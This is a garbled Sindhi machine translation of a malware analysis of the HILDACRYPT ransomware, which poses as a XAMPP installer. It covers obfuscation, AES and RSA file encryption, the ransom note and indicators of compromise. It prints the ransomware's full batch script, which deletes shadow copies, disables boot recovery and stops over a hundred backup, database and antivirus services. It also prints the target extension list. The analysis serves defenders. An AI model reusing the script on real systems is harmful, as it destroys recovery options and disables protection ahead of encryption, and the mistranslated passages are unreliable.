هيلو، حبر! هڪ ڀيرو ٻيهر، اسان Ransomware درجي مان مالويئر جي جديد نسخن بابت ڳالهائي رهيا آهيون. HILDACRYPT ھڪڙو نئون ransomware آھي، ھلدا خاندان جو ھڪڙو ميمبر جيڪو آگسٽ 2019 ۾ دريافت ڪيو ويو، Netflix ڪارٽون جي نالي تي رکيو ويو آھي جيڪو سافٽ ويئر کي ورهائڻ لاء استعمال ڪيو ويو. اڄ اسان هن تازه ڪاري ransomware وائرس جي ٽيڪنيڪل خاصيتن کان واقف ٿي رهيا آهيون.
Hilda ransomware جي پهرين ورزن ۾، يوٽيوب تي پوسٽ ڪيل هڪ جي لنڪ ڪارٽون سيريز تاوان خط ۾ شامل هو. HILDACRYPT هڪ جائز XAMPP انسٽالر جي طور تي نقاب پوش آهي، هڪ آسان انسٽال ڪرڻ واري اپاچي تقسيم جنهن ۾ ماريا ڊي بي، پي ايڇ پي، ۽ پرل شامل آهن. ساڳئي وقت، cryptolocker هڪ مختلف فائل جو نالو آهي - xamp. ان کان علاوه، ransomware فائل ۾ اليڪٽرانڪ دستخط نه آهي.
جامد تجزيو
رينسم ويئر هڪ PE32 .NET فائل ۾ موجود آهي جيڪو MS لاءِ لکيل آهي. Windowsان جي سائيز 135,168 بائيٽ آهي. مکيه پروگرام ڪوڊ ۽ محافظ ڪوڊ ٻئي C# ۾ لکيل آهن. تاليف جي تاريخ ۽ وقت جي اسٽيمپ جي مطابق، بائنري فائل 14 سيپٽمبر 2019 تي ٺاهي وئي هئي.
Detect It Easy جي مطابق، ransomware کي Confuser ۽ ConfuserEx استعمال ڪندي آرڪائيو ڪيو ويو آهي، پر اهي obfuscators ساڳيا آهن اڳي، صرف ConfuserEx ڪنفيوزر جو جانشين آهي، تنهنڪري انهن جا ڪوڊ دستخط هڪجهڙا آهن.
HILDACRYPT واقعي ConfuserEx سان ڀريل آهي.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
ويڪٽر تي حملو
گهڻو ڪري، ransomware دريافت ڪيو ويو ويب پروگرامنگ سائيٽن مان هڪ تي، هڪ جائز XAMPP پروگرام جي طور تي masquerading.
انفيڪشن جي پوري زنجير ۾ ڏسي سگهجي ٿو .
ابتڙ
ransomware strings encrypted فارم ۾ محفوظ ٿيل آهن. جڏهن لانچ ڪيو ويو، HILDACRYPT انهن کي بيس 64 ۽ AES-256-CBC استعمال ڪندي ڊيڪرپٽ ڪري ٿو.
تنصيب
سڀ کان پهريان، ransomware %AppDataRoaming% ۾ هڪ فولڊر ٺاهي ٿو جنهن ۾ GUID (Globally Unique Identifier) پيٽرول بي ترتيب ٺاهي وئي آهي. ھن جڳھ تي بيٽ فائل شامل ڪندي، ransomware وائرس ان کي cmd.exe استعمال ڪندي شروع ڪري ٿو:
cmd.exe /c JKfgkgj3hjgfhjka.bat ۽ نڪرڻ
اهو وري شروع ٿئي ٿو بيچ اسڪرپٽ تي عمل ڪرڻ لاءِ سسٽم جي خاصيتن يا خدمتن کي بند ڪرڻ لاءِ.
اسڪرپٽ ۾ حڪمن جي هڪ ڊگهي لسٽ شامل آهي جيڪا شيڊ ڪاپي کي تباهه ڪري، SQL سرور کي غير فعال، بيڪ اپ ۽ اينٽي وائرس حل.
مثال طور، اهو Acronis Backup خدمتن کي روڪڻ جي ناڪام ڪوشش ڪري ٿو. ان کان علاوه، اهو هيٺ ڏنل وينڊرز کان بيڪ اپ سسٽم ۽ اينٽي وائرس حل تي حملو ڪري ٿو: ويم، سوفوس، ڪاسپرسڪي، ميڪافي ۽ ٻيا.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
هڪ دفعو مٿي ذڪر ڪيل خدمتون ۽ عمل غير فعال ٿي وڃن ٿا، cryptolocker ٽاسڪ لسٽ ڪمانڊ استعمال ڪندي سڀني هلندڙ عملن جي باري ۾ معلومات گڏ ڪري ٿو انهي کي يقيني بڻائڻ لاءِ ته سڀئي ضروري خدمتون بند آهن.
ٽاسڪ لسٽ v/fo csv
ھي حڪم ھلندڙ عملن جي تفصيلي فهرست ڏيکاري ٿو، جن جا عنصر جدا ٿيل آھن "،" نشاني.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
هن چيڪ کان پوء، ransomware شروع ٿئي ٿو انڪرپشن عمل.
پاسخاطري ڪرڻ
فائل انڪريشن
HILDACRYPT هارڊ ڊرائيو جي سڀني مليل مواد مان گذري ٿو، سواءِ Recycle.Bin ۽ Reference AssembliesMicrosoft فولڊرن جي. بعد ۾ شامل آهن نازڪ dll، pdb وغيره. نيٽ ايپليڪيشنن لاءِ فائلون جيڪي ransomware جي آپريشن کي متاثر ڪري سگهن ٿيون. فائلن کي ڳولهڻ لاءِ جيڪي انڪرپٽ ڪيون وينديون، هيٺ ڏنل فهرستن جي توسيع استعمال ڪئي ويندي:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
ransomware استعمال ڪري ٿو AES-256-CBC الگورتھم استعمال ڪندڙ فائلن کي انڪرپٽ ڪرڻ لاءِ. اهم سائيز 256 بٽ آهي ۽ شروعاتي ویکٹر (IV) سائيز 16 بٽ آهي.
هيٺين اسڪرين شاٽ ۾، byte_2 ۽ byte_1 جا قدر حاصل ڪيا ويا بي ترتيب سان GetBytes().
ڪيٻي
ВИ
انڪريپٽ ٿيل فائل ۾ ايڪسٽينشن HCY آهي!.. هي هڪ انڪريپٽ ٿيل فائل جو هڪ مثال آهي. مٿي ذڪر ڪيل ڪي ۽ IV هن فائل لاءِ ٺاهيا ويا آهن.
اهم انڪرپشن
cryptolocker ٺاهيل AES ڪيئي کي انڪريپٽ ٿيل فائل ۾ محفوظ ڪري ٿو. انڪريپٽ ٿيل فائل جو پھريون حصو ھڪڙو ھيڊر آھي جنھن ۾ ڊيٽا شامل آھي جھڙوڪ HILDACRYPT، KEY، IV، FileLen XML فارميٽ ۾، ۽ ھن طرح نظر اچي ٿو:
AES ۽ IV ڪي انڪريشن RSA-2048 استعمال ڪندي ڪيو ويندو آهي، ۽ انڪوڊنگ ڪيو ويندو آهي Base64 استعمال ڪندي. RSA پبلڪ ڪني کي XML فارميٽ ۾ انڪريپٽ ٿيل تارن مان هڪ ۾ cryptolocker جي جسم ۾ ذخيرو ٿيل آهي.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
AES فائل ڪيچ کي انڪرپٽ ڪرڻ لاءِ هڪ RSA عوامي ڪيئي استعمال ٿئي ٿي. RSA پبلڪ ڪيئي بيس 64 انڪوڊ ٿيل آھي ۽ ھڪڙي ماڊلس تي مشتمل آھي ۽ 65537 جي پبلڪ ايڪسپونٽ تي مشتمل آھي. ڊيڪرپشن لاءِ RSA پرائيويٽ ڪيئي جي ضرورت آھي، جيڪا حملي ڪندڙ وٽ آھي.
RSA انڪرپشن کان پوءِ، AES ڪيئي انڪوڊ ٿيل آهي Base64 استعمال ڪندي انڪوڊ ٿيل فائل ۾ ذخيرو ٿيل.
تاوان جو نوٽيس
هڪ دفعو انڪريپشن مڪمل ٿيڻ بعد، HILDACRYPT html فائل کي فولڊر ۾ لکندو آهي جنهن ۾ هن فائلن کي انڪريپ ڪيو هو. ransomware نوٽيفڪيشن ۾ ٻه اي ميل ايڊريس شامل آهن جتي مقتول حملو ڪندڙ سان رابطو ڪري سگهي ٿو.
- hildalolilovesyou@airmail.cc
hildalolilovesyou@memeware.net
ڀتا خوري جي نوٽيس ۾ اها لائن پڻ شامل آهي ”ڪو به لولي محفوظ ناهي؛)“- جاپان ۾ پابندي مڙهيل ننڍڙن ڇوڪرين جي ظاهر سان گڏ anime ۽ منگا ڪردارن جو حوالو.
ٿڪل
HILDACRYPT، ھڪڙو نئون ransomware خاندان، ھڪڙو نئون ورزن جاري ڪيو آھي. انڪريپشن ماڊل قرباني کي روڪي ٿو رينسم ويئر پاران انڪرپٽ ٿيل فائلن کي ڊڪرپٽ ڪرڻ کان. Cryptolocker بيڪ اپ سسٽم ۽ اينٽي وائرس حل سان لاڳاپيل حفاظتي خدمتن کي غير فعال ڪرڻ لاءِ فعال حفاظتي طريقا استعمال ڪندو آهي. HILDACRYPT جو ليکڪ Netflix تي ڏيکاريل متحرڪ سيريز Hilda جو مداح آهي، جنهن جي ٽريلر جي لنڪ پروگرام جي پوئين ورزن جي خريداري خط ۾ شامل هئي.
حسب معمول، и توهان جي ڪمپيوٽر کي HILDACRYPT ransomware کان بچائي سگهي ٿو، ۽ مهيا ڪندڙن کي انهن جي گراهڪن جي حفاظت ڪرڻ جي صلاحيت آهي . تحفظ کي يقيني بڻايو وڃي ٿو حقيقت اها آهي ته اهي حل شامل آهن جنهن ۾ نه صرف بيڪ اپ، پر اسان جو مربوط سيڪيورٽي سسٽم پڻ شامل آهي - هڪ مشين لرننگ ماڊل پاران طاقتور ۽ رويي جي هوريسٽڪس جي بنياد تي، هڪ ٽيڪنالاجي جيڪا صفر-ڏينهن ransomware جي خطري کي منهن ڏيڻ جي قابل آهي جهڙوڪ ٻيو ڪو به ناهي.
سمجھوتي جا اشارا
فائل جي واڌ HCY!
HILDACRYPReadMe.html
xamp.exe هڪ اکر "p" سان ۽ ڊجيٽل دستخط نه
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
جو ذريعو: www.habr.com
